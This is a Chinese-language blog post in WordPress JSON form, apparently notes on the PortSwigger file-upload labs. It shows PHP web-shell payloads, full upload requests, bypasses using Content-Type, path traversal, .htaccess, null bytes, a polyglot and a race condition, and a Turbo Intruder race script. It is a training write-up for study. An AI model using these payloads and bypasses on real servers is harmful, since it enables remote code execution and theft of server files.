\u4e0a\u50b3\u6f0f\u6d1e\u662f\u6307 Web \u4f3a\u670d\u5668\u5141\u8a31\u4f7f\u7528\u8005\u5728\u672a\u5145\u5206\u9a57\u8b49\u6a94\u6848\u540d\u7a31\u3001\u985e\u578b\u3001\u5167\u5bb9\u6216\u5927\u5c0f\u7b49\u8cc7\u8a0a\u7684\u60c5\u6cc1\u4e0b\u5c07\u6a94\u6848\u4e0a\u50b3\u5230\u5176\u6a94\u6848\u7cfb\u7d71\u3002\u5982\u679c\u672a\u80fd\u6b63\u78ba\u57f7\u884c\u9019\u4e9b\u5b89\u5168\u9a57\u8b49\uff0c\u53ef\u80fd\u610f\u5473\u8457\u5373\u4f7f\u662f\u57fa\u672c\u7684\u5716\u50cf\u4e0a\u50b3\u529f\u80fd\u4e5f\u53ef\u4ee5\u7528\u4f86\u4e0a\u50b3\u4efb\u610f\u4e14\u5177\u6709\u6f5b\u5728\u5371\u96aa\u7684\u6a94\u6848\uff0c\u50cf\u662f\u767c\u52d5RCE\u529f\u80fd\uff0c\u8b93\u4f3a\u670d\u5668\u57f7\u884c\u653b\u64ca\u8005\u4e0a\u50b3\u7684\u60e1\u610f\u8173\u672c\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u4ee5\u4e0b\u662f\u4e00\u500b\u57fa\u672c\u7684\u653b\u64ca\u65b9\u5f0f\uff0c\u4e0a\u50b3\u60e1\u610f\u8173\u672c\uff0c\u76ee\u6a19\u662f\u57f7\u884c\u4ee3\u78bc\u8b80\u53d6secret\u5167\u5bb9<\/p>\n\n\n\n
\u9996\u5148\u5efa\u7acbexploit.php\u5982\u4e0b<\/p>\n\n\n\n
<?php echo file_get_contents('\/home\/carlos\/secret'); ?><\/code><\/pre>\n\n\n\n\u5230\u500b\u4eba\u5c08\u5340\u4f7f\u7528\u982d\u8c61\u529f\u80fd\u4e0a\u50b3exploit.php\u5f8c\uff0c\u9001\u51fa\u8acb\u6c42\u770b\u4e0a\u50b3\u5230\u4ec0\u9ebc\u4f4d\u7f6e<\/p>\n\n\n\n
######### request ###########\r\nGET \/my-account?id=wiener\r\n\n\r######### responsee ###########\n...omit...\n<p> <img src=\"\/files\/avatars\/exploit.php\" class=avatar> <\/p>\n...omit...<\/code><\/pre>\n\n\n\n\u78ba\u8a8d\u4f4d\u7f6e\u5f8c\u8a2a\u554f\/files\/avatars\/exploit.php\uff0c\u60e1\u610f\u4ee3\u78bc\u57f7\u884c\u5f8c\u6210\u529f\u8fd4\u56de\/home\/carlos\/secret\u7684\u5167\u5bb9<\/p>\n\n\n\n
######### request ###########\r\nGET \/files\/avatars\/exploit.php HTTP\/1.1\r\n\n######### responsee ###########\r\n...omit...\nowRf1LMZqjXqxfgH2SGY8i6KmvJ7uCp4\n...omit...<\/code><\/pre>\n\n\n\nLab: Remote code execution via web shell upload\u00a0<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n\u9952\u904e\u4fdd\u8b77\u6a5f\u5236<\/h2>\n\n\n\n
\u5927\u90e8\u4efd\u7684\u6a94\u6848\u4e0a\u50b3\u529f\u80fd\u90fd\u6709\u505a\u57fa\u672c\u4fdd\u8b77\uff0c\u5e38\u898b\u7684\u9952\u904e\u65b9\u5f0f\u6709<\/p>\n\n\n\n
\n- \u9952\u904eContent-Type\u4fdd\u8b77<\/li>\n\n\n\n
- \u9952\u904e\u76ee\u9304\u9650\u5236\u4fdd\u8b77<\/li>\n\n\n\n
- \u5229\u7528htaccess\u9952\u904e\u4fdd\u8b77<\/li>\n\n\n\n
- \u5229\u7528%00\u9952\u904e\u4fdd\u8b77<\/li>\n\n\n\n
- \u5229\u7528\u689d\u4ef6\u7af6\u901f\u9952\u904e\u4fdd\u8b77<\/li>\n<\/ul>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u9952\u904eContent-Type\u4fdd\u8b77<\/h2>\n\n\n\n
\u6709\u6642\u5019\u6703\u56e0\u70baContent-Type\u4fdd\u8b77\u800c\u7121\u6cd5\u4e0a\u50b3\u60e1\u610f\u4ee3\u78bc\uff0c\u53ea\u8981\u5728\u4e0a\u50b3\u6642\u6307\u5b9aContent-Type: image\/jpeg<\/code>\uff0c\u5c31\u80fd\u9952\u904eContent-Type\u4fdd\u8b77\uff0c\u5982\u4e0b<\/p>\n\n\n\nPOST \/my-account\/avatar HTTP\/1.1\r\n...omit...\r\n\r\n------WebKitFormBoundaryp3oyrc7qYoR2AN9X\r\nContent-Disposition: form-data; name=\"avatar\"; filename=\"exploit.php\"\r\nContent-Type: image\/jpeg\r\n\r\n<?php echo file_get_contents('\/home\/carlos\/secret'); ?><\/code><\/pre>\n\n\n\nLab: Web shell upload via Content-Type restriction bypass<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u9952\u904e\u76ee\u9304\u9650\u5236\u4fdd\u8b77<\/h2>\n\n\n\n
\u653b\u64ca\u8005\u4e0a\u50b3\u6a94\u6848\u7684\u4f4d\u7f6e\uff0c\u670d\u52d9\u5668\u53ef\u80fd\u5df1\u9650\u5236\u8a72\u4f4d\u7f6e\u7121\u6cd5\u8a2a\u554f\u5b58\u53d6\uff0c \u56e0\u6b64\u9700\u8981\u4e0a\u50b3\u5230\u4e0d\u540c\u7684\u76ee\u9304\u6e2c\u8a66\u770b\u770b\u3002
\u4f8b\u5982\u539f\u672c\u7684\u4f4d\u7f6e\/files\/avatars\/exploit.php<\/code> \u7121\u6cd5\u5b58\u53d6\uff0c\u4f46\u53ea\u8981\u628a\u4f4d\u7f6e\u63db\u6210 \/files\/avatars\/..\/exploit.php<\/code>\u5c31\u80fd\u57f7\u884c <\/p>\n\n\n\n\u5982\u4e0b\uff0c\u4e0a\u50b3\u6642\u628a\u539f\u672c\u7684\u6a94\u540dexploit.php<\/code>\u6539\u70ba..%2fexploit.php<\/code><\/p>\n\n\n\n######### request ###########\r\nPOST \/my-account\/avatar HTTP\/1.1\r\nHost: 0a2300d303d8d2fac02ef8be007000eb.web-security-academy.net\r\n...omit...\r\n\t------WebKitFormBoundaryPdYhK7VJfJQ8LRA7\r\n\tContent-Disposition: form-data; name=\"avatar\"; filename=\"..%2fexploit.php\"\r\n\tContent-Type: application\/octet-stream\r\n\t\r\n\t<?php echo file_get_contents('\/home\/carlos\/secret'); ?>\r\n\t------WebKitFormBoundaryPdYhK7VJfJQ8LRA7\r\n\tContent-Disposition: form-data; name=\"user\"\r\n\t\r\n\twiener\r\n\t------WebKitFormBoundaryPdYhK7VJfJQ8LRA7\r\n\tContent-Disposition: form-data; name=\"csrf\"\r\n\t\r\n\tKx9hxWw3KQX5cZct0IanSzb8mWfbMSDH\r\n\t------WebKitFormBoundaryPdYhK7VJfJQ8LRA7--\r\n\n######### responsee ###########\r\nHTTP\/1.1 200 OK\r\n...omit...\r\nThe file avatars\/..\/exploit.php has been uploaded.<p><a href=\"\/my-account\" title=\"Return to previous page\">\u00ab Back to My Account<\/a><\/p><\/code><\/pre>\n\n\n\n\u8fd4\u56de\u7d50\u679c\u6642\u53ef\u4ee5\u767c\u73fe\u4f4d\u7f6e\u8b8a\u6210avatars\/..\/exploit.php<\/code>\uff0c<\/p>\n\n\n\n\u53ea\u8981\u5f9e\u9019\u500b\u4f4d\u7f6e\u5c31\u80fd\u57f7\u884c\u525b\u4e0a\u50b3\u7684\u60e1\u610f\u4ee3\u78bc\uff0c\u5982\u4e0b<\/p>\n\n\n\n
######### request ###########\r\n\tGET \/files\/avatars\/..%2fexploit.php HTTP\/1.1\r\n\t..omit...\r\n\n######### responsee ###########\r\n\t...omit...\r\n\tcY9ns2luFeOcCohVRPee5jaU0lA4NcIo<\/code><\/pre>\n\n\n\nLab: Web shell upload via path traversal<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u5229\u7528htaccess\u9952\u904e\u4fdd\u8b77<\/h2>\n\n\n\n
\u5982\u679c\u76ee\u6a19\u670d\u52d9\u5668\u4f7f\u7528\u9650\u5236\u526f\u6a94\u540d\u7684\u65b9\u5f0f\u7981\u7528.php\u7684\u6a94\u6848\uff0c\u53ef\u4ee5\u5617\u8a66\u5148\u5c07.htaccess<\/code>\u4e0a\u50b3\uff0c\u8a72\u6a94\u6848\u5167\u5bb9\u5982\u4e0b<\/p>\n\n\n\nAddType application\/x-httpd-php php5<\/code><\/pre>\n\n\n\n\u63a5\u8457\u5728\u628aexploit.php<\/code>\u6539\u70baexploit.php5<\/code>\u4e0a\u50b3\uff0c\u5982\u679c\u6210\u529f\u9952\u904e\u5c31\u80fd\u57f7\u884c\u525b\u4e0a\u50b3\u7684\u60e1\u610f\u4ee3\u78bc<\/p>\n\n\n\nLab: Web shell upload via extension blacklist bypass<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u5229\u7528%00\u9952\u904e\u4fdd\u8b77<\/h2>\n\n\n\n
\u5982\u679c\u76ee\u6a19\u670d\u52d9\u5668\u4f7f\u7528\u9650\u5236\u526f\u6a94\u540d\u7684\u65b9\u5f0f\u7981\u7528.php\u7684\u6a94\u6848\uff0c\u53ef\u4ee5\u5617\u8a66%00.jpg<\/code><\/p>\n\n\n\n\u4f8b\u5982\u5c07\u539f\u672c\u7684exploit.php<\/code>\u6539\u540d\u70baexploit.php%00.jpg<\/code>\u5728\u4e0a\u50b3\uff0c\u5982\u4e0b<\/p>\n\n\n\n######### request ###########\r\nPOST \/my-account\/avatar HTTP\/1.1\r\n...omit...\r\n------WebKitFormBoundaryTERgKQlLAnrqsB9K\r\nContent-Disposition: form-data; name=\"avatar\"; filename=\"exploit.php%00.jpg\"\r\nContent-Type: application\/octet-stream\r\n\r\n<?php echo file_get_contents('\/home\/carlos\/secret'); ?>\r\n...omit...\n\r\n######### responsee ###########\r\n...omit...\r\nThe file avatars\/exploit.php has been uploaded.<p><a href=\"\/my-account\" title=\"Return to previous page\">\u00ab Back to My Account<\/a><\/p><\/code><\/pre>\n\n\n\n\u53ef\u4ee5\u8fd4\u56de\u7d50\u679c\u767c\u73fe\u6a94\u540d\u53c8\u8b8a\u56deexploit.php<\/code><\/p>\n\n\n\nLab: Web shell upload via obfuscated file extension<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u5229\u7528polyglot\u9952\u904e\u4fdd\u8b77<\/h2>\n\n\n\n
\u5982\u679c\u76ee\u6a19\u670d\u52d9\u5668\u7981\u6b62\u4e0a\u50b3php\u6a94\u6848\uff0c\u53ef\u4ee5\u5617\u8a66polyglot<\/code><\/p>\n\n\n\n\u6e96\u5099\u4e00\u500b\u5716\u6a94\uff0c\u4f8b\u5982dessert.jpg\uff0c\u63a5\u8457\u5728\u900f\u904eexiftool <\/code>\u5de5\u5177\u5efa\u7acb\u4e00\u500bPHP\/JPG\u6a94\uff0c\u5982\u4e0b<\/p>\n\n\n\nexiftool -Comment=\"<?php echo 'START ' . file_get_contents('\/home\/carlos\/secret') . ' END'; ?>\" dessert.jpg -o polyglot.php<\/code><\/pre>\n\n\n\n\u5c07\u65b0\u7522\u751f\u7684polyglot.php\u4e0a\u50b3\uff0c\u5982\u679c\u76ee\u6a19\u670d\u52d9\u652f\u6301\u8a72\u65b9\u6cd5\uff0c\u5247\u53ef\u57f7\u884c\u525b\u4e0a\u50b3\u7684\u60e1\u610f\u4ee3\u78bc<\/p>\n\n\n\n
Lab: Remote code execution via polyglot web shell upload<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u5229\u7528\u689d\u4ef6\u7af6\u901f\u9952\u904e\u4fdd\u8b77<\/h2>\n\n\n\n
\u5047\u5982\u4e0a\u50b3\u529f\u80fd\u7684\u4ee3\u78bc\u5982\u4e0b\uff0c\u53ef\u4ee5\u767c\u73fe\u6a94\u6848\u4e0a\u50b3\u5f8c\uff0c\u624d\u6703\u57f7\u884ccheckFileType\u3002\u63db\u53e5\u8a71\u8aaa\uff0c\u5982\u679c\u5728\u6aa2\u67e5\u524d\u5c31\u7acb\u523b\u8a2a\u554f\u525b\u4e0a\u50b3\u7684\u6a94\u6848\u4e5f\u662f\u53ef\u884c\u7684<\/p>\n\n\n\n
$target_dir = \"avatars\/\";\r\n$target_file = $target_dir . $_FILES[\"avatar\"][\"name\"];\r\n\/\/ temporary move\r\nmove_uploaded_file($_FILES[\"avatar\"][\"tmp_name\"], $target_file);\r\nif (checkViruses($target_file) && checkFileType($target_file)) { \/\/ servere will check file by checkFileType\n echo \"The file \". htmlspecialchars( $target_file). \" has been uploaded.\";\n}else{\n...omit... <\/code><\/pre>\n\n\n\n\u56e0\u6b64\u653b\u64ca\u8005\u5fc5\u9808\u8981\u5728\u4e0a\u50b3\u60e1\u610f\u4ee3\u78bc\u5f8c\u7acb\u523b\u57f7\u884c\uff0c\u624d\u53ef\u4ee5\u63d0\u524d\u5728checkFileType\u524d\u5b8c\u6210\u653b\u64ca<\/p>\n\n\n\n
\u53ef\u4ee5\u900f\u904eburpsuite\/repeater<\/code>\u7684group send\u529f\u80fd\uff0c\u5c07\u4ee5\u4e0b2\u500b\u8acb\u6c42\u50b3\u9001\u7d66\u76ee\u6a19<\/p>\n\n\n\ngroup\u7684\u7b2c\u4e00\u500b\u8acb\u6c42\u8981\u4e0a\u50b3exploit.php<\/code>\uff0cgroup\u7684\u7b2c\u4e8c\u500b\u8acb\u6c42\u8981\u8a2a\u554f\/files\/avatars\/exploit.php<\/code><\/p>\n\n\n\n######### request 1 ###########\nPOST \/my-account\/avatar HTTP\/1.1 \r\n...omit...\r\n------WebKitFormBoundary6AbLEn8kWARqcr5J \r\nContent-Disposition: form-data; name=\"avatar\"; filename=\"exploit.php\" \r\nContent-Type: application\/octet-stream \r\n<?php echo file_get_contents('\/home\/carlos\/secret'); ?> \r\n------WebKitFormBoundary6AbLEn8kWARqcr5J \n...omit...\n\n######### request 2 ###########\nGET \/files\/avatars\/exploit.php HTTP\/1.1 \n...omit...<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u4e5f\u53ef\u4ee5\u900f\u904eburpsuite\/turbo intruder<\/code>\u529f\u80fd\uff0c\u5feb\u901f\u50b3\u90012\u500b\u8acb\u6c42\uff0c\u4ee3\u78bc\u5982\u4e0b<\/p>\n\n\n\ndef queueRequests(target, wordlists): \r\n engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,) \r\n request1 = '''\r\nPOST \/my-account\/avatar HTTP\/1.1 \r\nHost: 0adb006003a60f93c016dafa00c400c8.web-security-academy.net \r\nCookie: session=tUY73RWMyz9mVc5qvhALwRnLR9f0yUqX \r\nContent-Length: 478 \r\nCache-Control: max-age=0 \r\nSec-Ch-Ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\" \r\nSec-Ch-Ua-Mobile: ?0 \r\nSec-Ch-Ua-Platform: \"Windows\" \r\nUpgrade-Insecure-Requests: 1 \r\nOrigin: https:\/\/0adb006003a60f93c016dafa00c400c8.web-security-academy.net \r\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundary6AbLEn8kWARqcr5J \r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.0.0 Safari\/537.36 \r\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9 \r\nSec-Fetch-Site: same-origin \r\nSec-Fetch-Mode: navigate \r\nSec-Fetch-User: ?1 \r\nSec-Fetch-Dest: document \r\nReferer: https:\/\/0adb006003a60f93c016dafa00c400c8.web-security-academy.net\/my-account \r\nAccept-Encoding: gzip, deflate \r\nAccept-Language: zh-CN,zh;q=0.9 \r\nConnection: keep-alive \r\n------WebKitFormBoundary6AbLEn8kWARqcr5J \r\nContent-Disposition: form-data; name=\"avatar\"; filename=\"exploit.php\" \r\nContent-Type: application\/octet-stream \r\n<?php echo file_get_contents('\/home\/carlos\/secret'); ?> \r\n------WebKitFormBoundary6AbLEn8kWARqcr5J \r\nContent-Disposition: form-data; name=\"user\" \r\nwiener \r\n------WebKitFormBoundary6AbLEn8kWARqcr5J \r\nContent-Disposition: form-data; name=\"csrf\" \r\nUnwQ3Vrq6oQtNgnijOnPNLsbLB3vmvML \r\n------WebKitFormBoundary6AbLEn8kWARqcr5J--\r\n''' \r\n request2 = '''\r\nGET \/files\/avatars\/exploit.php HTTP\/1.1 \r\nHost: 0adb006003a60f93c016dafa00c400c8.web-security-academy.net \r\nCookie: session=tUY73RWMyz9mVc5qvhALwRnLR9f0yUqX \r\nSec-Ch-Ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\" \r\nSec-Ch-Ua-Mobile: ?0 \r\nSec-Ch-Ua-Platform: \"Windows\" \r\nUpgrade-Insecure-Requests: 1 \r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.0.0 Safari\/537.36 \r\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9 \r\nSec-Fetch-Site: same-origin \r\nSec-Fetch-Mode: navigate \r\nSec-Fetch-User: ?1 \r\nSec-Fetch-Dest: document \r\nReferer: https:\/\/0adb006003a60f93c016dafa00c400c8.web-security-academy.net\/my-account\/avatar \r\nAccept-Encoding: gzip, deflate \r\nAccept-Language: zh-CN,zh;q=0.9 \r\nConnection: keep-alive\r\n''' \r\n # the 'gate' argument blocks the final byte of each request until openGate is invoked \r\n engine.queue(request1, gate='race1') \r\n for x in range(5): \r\n engine.queue(request2, gate='race1') \r\n # wait until every 'race1' tagged request is ready \r\n # then send the final byte of each request \r\n # (this method is non-blocking, just like queue) \r\n engine.openGate('race1') \r\n engine.complete(timeout=60) \r\ndef handleResponse(req, interesting): \r\n table.add(req)<\/code><\/pre>\n\n\n\nLab: Web shell upload via race condition<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4e0a\u50b3\u6f0f\u6d1e\u662f\u6307 Web \u4f3a\u670d\u5668\u5141\u8a31\u4f7f\u7528\u8005\u5728\u672a\u5145\u5206\u9a57\u8b49\u6a94\u6848\u540d\u7a31\u3001 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[38],"tags":[],"class_list":["post-1139","post","type-post","status-publish","format-standard","hentry","category-serverside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1139","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1139"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1139\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1139"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1139"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1139"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}